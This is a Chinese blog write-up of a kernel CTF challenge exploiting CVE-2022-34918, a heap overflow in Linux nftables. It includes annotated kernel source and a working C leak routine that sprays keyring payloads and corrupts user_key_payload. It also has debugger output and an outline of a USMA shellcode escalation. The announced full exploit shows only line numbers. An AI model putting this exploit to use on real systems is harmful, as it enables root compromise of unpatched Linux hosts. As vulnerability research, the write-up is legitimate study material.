0%

堆溢出+CVE-2022-34918

CVE-2022-34918

1
Linux version 5.17.15 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #2 SMP PREEMPT Tue Dec 12 20:07:22 CST 2023
1
2
3
4
5
6
7
8
9
10
qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 oops=panic panic=-1 pti=on kaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1
  • smap,smep,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

poweroff -d 0 -f

内核下载: Index of /pub/linux/kernel/v5.x/

关键的编译选项如下:

1
2
3
4
5
6
7
CONFIG_NF_TABLES=y
CONFIG_NETFILTER_NETLINK=y
CONFIG_BINFMT_MISC=m
CONFIG_USER_NS=y

CONFIG_E1000=m
CONFIG_E1000E=m

Netfilter 介绍

Netfilter 是一个 Linux 内核模块,用于防火墙功能,它提供了一个灵活的框架,允许用户自定义防火墙规则,以控制网络流量和保护网络安全

Netfilter 模块是 Linux 内核中流量过滤器的基础,可以与多种其他模块一起使用(例如:iptables 和 ip6tables),具有如下功能:

  • 网络地址转换(Network Address Translate)
  • 数据包内容修改
  • 数据包过滤的防火墙功能

在分析 Netfilter 之前先解释一些防火墙的相关概念:

链的概念:

  • 数据报文从进入服务器到出来会经过5道关卡,分别为:
    • Prerouting(路由前)、Input(输入)、Outpu(输出)、Forward(转发)、Postrouting(路由后)
  • 每一道关卡中有多个规则,数据报文必须按顺序一个一个匹配这些规则,这些规则串起来就像一条链,所以我们把这些关卡都叫“链”

1702384117476

表的概念:

  • 每一条链上有多条规则,有些规则的作用相似,多条具有相同功能的规则合在一起就组成了一个“表”
  • Netfilter 模块拥有5个表:
    • filter 表:用于过滤包,有 INPUT、FORWARD、OUTPUT 三个链(最常用的表)
    • nat 表:用于网络地址转换,有 PREROUTING、POSTROUTING 三个链
    • managle 表:用于给数据包做标记,几乎用不到
    • raw 表:可以实现不追踪某些数据包
    • security 表:用于强制访问控制(MAC)的网络规则(在centos6中并没有)

规则的概念:

  • 规则主要包含 “条件&动作”,即匹配出符合什么条件(规则)后,对它采取怎样的动作
  • 规则被添加到指定表的指定链中,由表达式和语句组成

表达式的概念:

  • 表达式表示值,可以是网络地址、端口号等常量,也可以是在规则集评估期间从数据包中收集的数据
  • 可以使用二进制、逻辑、关系和其他类型的表达式组合表达式以形成复杂或关系(匹配)表达式
  • 每个表达式都有一个数据类型,它决定了符号值的大小、解析和表示以及与其他表达式的类型兼容性

该模块的初始化由 nfnetlink_net_init 函数执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static int __net_init nfnetlink_net_init(struct net *net)
{
struct nfnl_net *nfnlnet = nfnl_pernet(net);
struct netlink_kernel_cfg cfg = {
.groups = NFNLGRP_MAX,
.input = nfnetlink_rcv,
#ifdef CONFIG_MODULES
.bind = nfnetlink_bind,
#endif
};

nfnlnet->nfnl = netlink_kernel_create(net, NETLINK_NETFILTER, &cfg);
if (!nfnlnet->nfnl)
return -ENOMEM;
return 0;
}
  • 如果后续收到 netfilter 的消息则会调用 netlink_kernel_cfg->input 函数,也即 nfnetlink_rcv 函数

创建 table 的函数:nf_tables_newtable

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
static int nf_tables_newtable(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
struct nft_ctx ctx;
u32 flags = 0;
int err;

lockdep_assert_held(&nft_net->commit_mutex);
attr = nla[NFTA_TABLE_NAME];
table = nft_table_lookup(net, attr, family, genmask,
NETLINK_CB(skb).portid); /* 查找名称为NFTA_TABLE_NAME的table是否存在 */
if (IS_ERR(table)) {
if (PTR_ERR(table) != -ENOENT)
return PTR_ERR(table);
} else {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);

return nf_tables_updtable(&ctx); /* 如果存在该table,则进行更新 */
}

if (nla[NFTA_TABLE_FLAGS]) {
flags = ntohl(nla_get_be32(nla[NFTA_TABLE_FLAGS]));
if (flags & ~NFT_TABLE_F_MASK)
return -EOPNOTSUPP;
}

err = -ENOMEM;
table = kzalloc(sizeof(*table), GFP_KERNEL); /* 如果不存在就创建该表,并初始化 */
if (table == NULL)
goto err_kzalloc;

table->name = nla_strdup(attr, GFP_KERNEL);
if (table->name == NULL)
goto err_strdup;

if (nla[NFTA_TABLE_USERDATA]) {
table->udata = nla_memdup(nla[NFTA_TABLE_USERDATA], GFP_KERNEL);
if (table->udata == NULL)
goto err_table_udata;

table->udlen = nla_len(nla[NFTA_TABLE_USERDATA]);
}

err = rhltable_init(&table->chains_ht, &nft_chain_ht_params);
if (err)
goto err_chain_ht;

INIT_LIST_HEAD(&table->chains); /* 初始化4个链表 */
INIT_LIST_HEAD(&table->sets);
INIT_LIST_HEAD(&table->objects);
INIT_LIST_HEAD(&table->flowtables);
table->family = family;
table->flags = flags;
table->handle = ++table_handle;
if (table->flags & NFT_TABLE_F_OWNER)
table->nlpid = NETLINK_CB(skb).portid;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla); /* 将table加到nftbales上下文中 */
err = nft_trans_table_add(&ctx, NFT_MSG_NEWTABLE);
if (err < 0)
goto err_trans;

list_add_tail_rcu(&table->list, &nft_net->tables);
return 0;
err_trans:
rhltable_destroy(&table->chains_ht);
err_chain_ht:
kfree(table->udata);
err_table_udata:
kfree(table->name);
err_strdup:
kfree(table);
err_kzalloc:
return err;
}

创建 chain 的函数:nf_tables_newchain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
static int nf_tables_newchain(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct nft_chain *chain = NULL;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
u8 policy = NF_ACCEPT;
struct nft_ctx ctx;
u64 handle = 0;
u32 flags = 0;

lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_CHAIN_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* 首先先找table,无table直接退出 */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_TABLE]);
return PTR_ERR(table);
}

chain = NULL;
attr = nla[NFTA_CHAIN_NAME]; /* 找chain是否存在,存在进入update,不存在则添加一个新chain */

if (nla[NFTA_CHAIN_HANDLE]) { /* 通过nla[NFTA_CHAIN_HANDLE]查找chain */
handle = be64_to_cpu(nla_get_be64(nla[NFTA_CHAIN_HANDLE]));
chain = nft_chain_lookup_byhandle(table, handle, genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_HANDLE]);
return PTR_ERR(chain);
}
attr = nla[NFTA_CHAIN_HANDLE];
} else if (nla[NFTA_CHAIN_NAME]) { /* 通过nla[NFTA_CHAIN_NAME]查找chain */
chain = nft_chain_lookup(net, table, attr, genmask);
if (IS_ERR(chain)) {
if (PTR_ERR(chain) != -ENOENT) {
NL_SET_BAD_ATTR(extack, attr);
return PTR_ERR(chain);
}
chain = NULL;
}
} else if (!nla[NFTA_CHAIN_ID]) {
return -EINVAL;
}

if (nla[NFTA_CHAIN_POLICY]) {
if (chain != NULL &&
!nft_is_base_chain(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

if (chain == NULL &&
nla[NFTA_CHAIN_HOOK] == NULL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

policy = ntohl(nla_get_be32(nla[NFTA_CHAIN_POLICY]));
switch (policy) {
case NF_DROP:
case NF_ACCEPT:
break;
default:
return -EINVAL;
}
}

if (nla[NFTA_CHAIN_FLAGS])
flags = ntohl(nla_get_be32(nla[NFTA_CHAIN_FLAGS]));
else if (chain)
flags = chain->flags;

if (flags & ~NFT_CHAIN_FLAGS)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

if (chain != NULL) {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

flags |= chain->flags & NFT_CHAIN_BASE;
return nf_tables_updchain(&ctx, genmask, policy, flags, attr,
extack); /* 找到chain则更新 */
}

return nf_tables_addchain(&ctx, family, genmask, policy, flags, extack); /* 未找到就调用该函数进行创建 */
}

创建 rule & expression 的函数:nf_tables_newrule

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
unsigned int size, i, n, ulen = 0, usize = 0;
u8 genmask = nft_genmask_next(info->net);
struct nft_rule *rule, *old_rule = NULL;
struct nft_expr_info *expr_info = NULL;
u8 family = info->nfmsg->nfgen_family;
struct nft_flow_rule *flow = NULL;
struct net *net = info->net;
struct nft_userdata *udata;
struct nft_table *table;
struct nft_chain *chain;
struct nft_trans *trans;
u64 handle, pos_handle;
struct nft_expr *expr;
struct nft_ctx ctx;
struct nlattr *tmp;
int err, rem;

lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_RULE_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* 获取table */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_TABLE]);
return PTR_ERR(table);
}

if (nla[NFTA_RULE_CHAIN]) { /* 获取chain */
chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN],
genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
return PTR_ERR(chain);
}
if (nft_chain_is_bound(chain))
return -EOPNOTSUPP;

} else if (nla[NFTA_RULE_CHAIN_ID]) {
chain = nft_chain_lookup_byid(net, nla[NFTA_RULE_CHAIN_ID]);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
return PTR_ERR(chain);
}
} else {
return -EINVAL;
}

if (nla[NFTA_RULE_HANDLE]) {
handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_HANDLE]));
rule = __nft_rule_lookup(chain, handle);
if (IS_ERR(rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return PTR_ERR(rule);
}

if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
old_rule = rule;
else
return -EOPNOTSUPP;
} else {
if (!(info->nlh->nlmsg_flags & NLM_F_CREATE) ||
info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EINVAL;
handle = nf_tables_alloc_handle(table);

if (chain->use == UINT_MAX)
return -EOVERFLOW;

if (nla[NFTA_RULE_POSITION]) {
pos_handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_POSITION]));
old_rule = __nft_rule_lookup(chain, pos_handle);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION]);
return PTR_ERR(old_rule);
}
} else if (nla[NFTA_RULE_POSITION_ID]) {
old_rule = nft_rule_lookup_byid(net, nla[NFTA_RULE_POSITION_ID]);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION_ID]);
return PTR_ERR(old_rule);
}
}
}

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

n = 0;
size = 0;
if (nla[NFTA_RULE_EXPRESSIONS]) { /* 若设置了nla[NFTA_RULE_EXPRESSIONS],会先把所有的expression遍历出来,计算其总值放在size中 */
expr_info = kvmalloc_array(NFT_RULE_MAXEXPRS,
sizeof(struct nft_expr_info),
GFP_KERNEL);
if (!expr_info)
return -ENOMEM;

nla_for_each_nested(tmp, nla[NFTA_RULE_EXPRESSIONS], rem) {
err = -EINVAL;
if (nla_type(tmp) != NFTA_LIST_ELEM)
goto err_release_expr;
if (n == NFT_RULE_MAXEXPRS)
goto err_release_expr;
err = nf_tables_expr_parse(&ctx, tmp, &expr_info[n]);
if (err < 0) {
NL_SET_BAD_ATTR(extack, tmp);
goto err_release_expr;
}
size += expr_info[n].ops->size;
n++;
}
}
/* Check for overflow of dlen field */
err = -EFBIG;
if (size >= 1 << 12)
goto err_release_expr;

if (nla[NFTA_RULE_USERDATA]) { /* 若设置了nla[NFTA_RULE_USERDATA],获取userdata的大小放在usize中 */
ulen = nla_len(nla[NFTA_RULE_USERDATA]);
if (ulen > 0)
usize = sizeof(struct nft_userdata) + ulen;
}

err = -ENOMEM;
rule = kzalloc(sizeof(*rule) + size + usize, GFP_KERNEL); /* 分配内存,创建一个rule,并初始化相关数据域 */
if (rule == NULL)
goto err_release_expr;

nft_activate_next(net, rule);

rule->handle = handle;
rule->dlen = size;
rule->udata = ulen ? 1 : 0;

if (ulen) {
udata = nft_userdata(rule);
udata->len = ulen - 1;
nla_memcpy(udata->data, nla[NFTA_RULE_USERDATA], ulen);
}

expr = nft_expr_first(rule);
for (i = 0; i < n; i++) {
err = nf_tables_newexpr(&ctx, &expr_info[i], expr);
if (err < 0) {
NL_SET_BAD_ATTR(extack, expr_info[i].attr);
goto err_release_rule;
}

if (expr_info[i].ops->validate)
nft_validate_state_update(net, NFT_VALIDATE_NEED);

expr_info[i].ops = NULL;
expr = nft_expr_next(expr);
}

if (chain->flags & NFT_CHAIN_HW_OFFLOAD) {
flow = nft_flow_rule_create(net, rule);
if (IS_ERR(flow)) {
err = PTR_ERR(flow);
goto err_release_rule;
}
}

if (info->nlh->nlmsg_flags & NLM_F_REPLACE) {
err = nft_delrule(&ctx, old_rule);
if (err < 0)
goto err_destroy_flow_rule;

trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (trans == NULL) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}
list_add_tail_rcu(&rule->list, &old_rule->list);
} else {
trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (!trans) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}

if (info->nlh->nlmsg_flags & NLM_F_APPEND) {
if (old_rule)
list_add_rcu(&rule->list, &old_rule->list);
else
list_add_tail_rcu(&rule->list, &chain->rules);
} else {
if (old_rule)
list_add_tail_rcu(&rule->list, &old_rule->list);
else
list_add_rcu(&rule->list, &chain->rules);
}
}
kvfree(expr_info);
chain->use++;

if (flow)
nft_trans_flow_rule(trans) = flow;

if (nft_net->validate_state == NFT_VALIDATE_DO)
return nft_table_validate(net, table);

return 0;

err_destroy_flow_rule:
if (flow)
nft_flow_rule_destroy(flow);
err_release_rule:
nf_tables_rule_release(&ctx, rule);
err_release_expr:
for (i = 0; i < n; i++) {
if (expr_info[i].ops) {
module_put(expr_info[i].ops->type->owner);
if (expr_info[i].ops->type->release_ops)
expr_info[i].ops->type->release_ops(expr_info[i].ops);
}
}
kvfree(expr_info);

return err;
}

expresssion 总共有如下多种类型:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static struct nft_expr_type *nft_basic_types[] = {
&nft_imm_type,
&nft_cmp_type,
&nft_lookup_type,
&nft_bitwise_type,
&nft_byteorder_type,
&nft_payload_type,
&nft_dynset_type,
&nft_range_type,
&nft_meta_type,
&nft_rt_type,
&nft_exthdr_type,
&nft_last_type,
&nft_counter_type,
};

漏洞分析

漏洞来自于 CVE-2022-34918,函数 nft_set_elem_init 存在堆溢出,溢出长度可达 64-16=48 字节,漏洞对象可以位于 kmalloc-{64,96,128,192}

先看 nft_set_elem_init 函数的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
void *nft_set_elem_init(const struct nft_set *set,
const struct nft_set_ext_tmpl *tmpl,
const u32 *key, const u32 *key_end,
const u32 *data, u64 timeout, u64 expiration, gfp_t gfp)
{
struct nft_set_ext *ext;
void *elem;

elem = kzalloc(set->ops->elemsize + tmpl->len, gfp); /* 这里的tmpl->len已经包括了desc.dlen */
if (elem == NULL)
return NULL;

ext = nft_set_elem_ext(set, elem);
nft_set_ext_init(ext, tmpl);

if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY))
memcpy(nft_set_ext_key(ext), key, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
memcpy(nft_set_ext_data(ext), data, set->dlen); /* 如果set->dlen不等于desc.dlen,则有可能发生溢出 */
if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION)) {
*nft_set_ext_expiration(ext) = get_jiffies_64() + expiration;
if (expiration == 0)
*nft_set_ext_expiration(ext) += timeout;
}
if (nft_set_ext_exists(ext, NFT_SET_EXT_TIMEOUT))
*nft_set_ext_timeout(ext) = timeout;

return elem;
}
  • 函数 memcpy 使用的拷贝长度来自于 nft_set 对象,但拷贝的目标是 nft_set_ext,其大小来自于 nft_set_ext_tmpl 对象
  • 如果 kzalloc 申请的大小和 memcpy 拷贝的大小不匹配,则可能发生堆溢出

两个关键结构体的条目如下:

1
2
3
4
5
struct nft_set_ext {
u8 genmask;
u8 offset[NFT_SET_EXT_NUM];
char data[];
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
struct nft_set {
struct list_head list;
struct list_head bindings;
struct nft_table *table;
possible_net_t net;
char *name;
u64 handle;
u32 ktype;
u32 dtype;
u32 objtype;
u32 size;
u8 field_len[NFT_REG32_COUNT];
u8 field_count;
u32 use;
atomic_t nelems;
u32 ndeact;
u64 timeout;
u32 gc_int;
u16 policy;
u16 udlen;
unsigned char *udata;
/* runtime data below here */
const struct nft_set_ops *ops ____cacheline_aligned;
u16 flags:14,
genmask:2;
u8 klen;
u8 dlen;
u8 num_exprs;
struct nft_expr *exprs[NFT_SET_EXPR_MAX];
struct list_head catchall_list;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};

分析 nft_add_set_elem 函数,确定 tmpl->len 的初始化过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
const struct nlattr *attr, u32 nlmsg_flags)
{

......

timeout = 0;
if (nla[NFTA_SET_ELEM_TIMEOUT] != NULL) {
if (!(set->flags & NFT_SET_TIMEOUT))
return -EINVAL;
err = nf_msecs_to_jiffies64(nla[NFTA_SET_ELEM_TIMEOUT],
&timeout);
if (err)
return err;
} else if (set->flags & NFT_SET_TIMEOUT) {
timeout = set->timeout;
}

......

if (nla[NFTA_SET_ELEM_KEY]) {
err = nft_setelem_parse_key(ctx, set, &elem.key.val,
nla[NFTA_SET_ELEM_KEY]);
if (err < 0)
goto err_set_elem_expr;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY, set->klen); /* 将tmpl->len初始化为set->klen */
}

if (nla[NFTA_SET_ELEM_KEY_END]) {
err = nft_setelem_parse_key(ctx, set, &elem.key_end.val,
nla[NFTA_SET_ELEM_KEY_END]);
if (err < 0)
goto err_parse_key;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY_END, set->klen); /* 将tmpl->len初始化为set->klen */
}

......

if (nla[NFTA_SET_ELEM_OBJREF] != NULL) {
if (!(set->flags & NFT_SET_OBJECT)) {
err = -EINVAL;
goto err_parse_key_end;
}
obj = nft_obj_lookup(ctx->net, ctx->table,
nla[NFTA_SET_ELEM_OBJREF],
set->objtype, genmask);
if (IS_ERR(obj)) {
err = PTR_ERR(obj);
goto err_parse_key_end;
}
nft_set_ext_add(&tmpl, NFT_SET_EXT_OBJREF);
}

if (nla[NFTA_SET_ELEM_DATA] != NULL) {
err = nft_setelem_parse_data(ctx, set, &desc, &elem.data.val,
nla[NFTA_SET_ELEM_DATA]);
if (err < 0)
goto err_parse_key_end;

dreg = nft_type_to_reg(set->dtype);
list_for_each_entry(binding, &set->bindings, list) {
struct nft_ctx bind_ctx = {
.net = ctx->net,
.family = ctx->family,
.table = ctx->table,
.chain = (struct nft_chain *)binding->chain,
};

if (!(binding->flags & NFT_SET_MAP))
continue;

err = nft_validate_register_store(&bind_ctx, dreg,
&elem.data.val,
desc.type, desc.len);
if (err < 0)
goto err_parse_data;

if (desc.type == NFT_DATA_VERDICT &&
(elem.data.val.verdict.code == NFT_GOTO ||
elem.data.val.verdict.code == NFT_JUMP))
nft_validate_state_update(ctx->net,
NFT_VALIDATE_NEED);
}

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_DATA, desc.len); /* 将tmpl->len初始化为desc.len */
}

......

}
  • 在该函数中,tmpl->len 将被初始化为 desc.len(跟 set->dlen 没有必然的联系)

用于控制 tmpl->len 大小的 nft_data_desc 结构体可以被用户控制,相关函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data_desc *desc,
struct nft_data *data,
struct nlattr *attr)
{
int err;

err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr); /* 据用户输入的attr来初始化desc和data */
if (err < 0)
return err;

if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) { /* 想要触发堆溢出,desc->len必定小于set->dlen,因此需要NFT_DATA_VERDICT标志位 */
nft_data_release(data, desc->type);
return -EINVAL;
}

return 0;
}

漏洞的触发链为:

  • nf_tables_newsetelem -> nft_add_set_elem -> nft_set_elem_init

入侵思路

核心步骤参考了该博客:基于USMA的内核通用EXP编写思路在 CVE-2022-34918 上的实践 (veritas501.github.io)

该 CVE 的堆溢出发生在 nftables 过滤器元素添加进入过滤器的过程(这个元素可以是任何一种可以用于过滤网络流量的类型,例如 IP 地址、端口号、协议类型等)

首先使用该堆溢出来覆盖 user_key_payload->datalen 用于泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
int do_leak(void) {
key_serial_t id_buffer[SPRAY_KEY_CNT] = {0};
key_serial_t corrupted_key_id = 0;

struct leak_payload leak_payload;
memset(&leak_payload, 0, sizeof(struct leak_payload));
leak_payload.len = CORRUPT_SIZE;

retry:
puts("spraying user_key_payload ...");
spray_keyring(id_buffer, SPRAY_KEY_CNT); /* 填充user_key_payload */

puts("free some key to create holes ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("trigger oob write ...");
/* 填充hole并尝试堆溢出(填充刚刚释放的kmalloc-32) */
add_elem_to_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct leak_payload), (uint8_t *)&leak_payload);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id)) {
/* 堆喷id_buffer,查找被覆盖的user_key_payload */
printf("found keyring %d is corrupted!", corrupted_key_id);
} else {
puts("can't found corrupted keyring, retry ...");
key_revokes(id_buffer, SPRAY_KEY_CNT);
goto retry;
}

puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i++) {
if (id_buffer[i] == corrupted_key_id) {
continue;
}
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
leak_ptr = get_keyring_leak(corrupted_key_id); // proc_fs_context_ops
if (!leak_ptr) {
puts("leak rcu.func failed");
for (int i = 0; i < SPRAY_KEY_CNT; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);

return 0;
}
  • 通过 user_key_payload 做越界读,就可能读到 rcu.func 中的 user_free_payload_rcu 这个函数指针,从而泄露出内核代码段地址

调试信息如下:

1
2
*RDI  0xffff88800fae9548 ◂— 0x2fb0
*RSI 0xffffc90000607828 ◂— 0x0
1
0xffffffff81b96fdf <nft_set_elem_init+367>    rep movsq qword ptr [rdi], qword ptr [rsi]
1
2
3
4
pwndbg> telescope 0xffff88800fae9548
00:00000xffff88800fae9548 ◂— 0x0
01:0008│ rdi 0xffff88800fae9550 ◂— 0x8000
02:00100xffff88800fae9558 ◂— 'AAAAAAAAA'
1
2
3
4
pwndbg> telescope 0xffffc90000607828
00:00000xffffc90000607828 ◂— 0x0
01:0008│ rsi 0xffffc90000607830 —▸ 0xffffffff81b88000 (nfnetlink_rcv_batch+1456) ◂— mov qword ptr [r15 + 8], rax
02:00100xffffc90000607838 ◂— 0x1
  • user_key_payload->datalen(0xffff88800fae9550) 将会被覆盖为 0x8000
  • PS:这个 0xffffffff81b88000 源自于之前遗留的地址,我们只会使用其最后两字节

然后选择覆盖 ring buffer(pg_vec) 来打 USMA,将 user_free_payload_rcu 函数覆盖为 shellcode 即可(PS:可以使用大量的 nop 来填充 shellcode,增大打通的概率)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
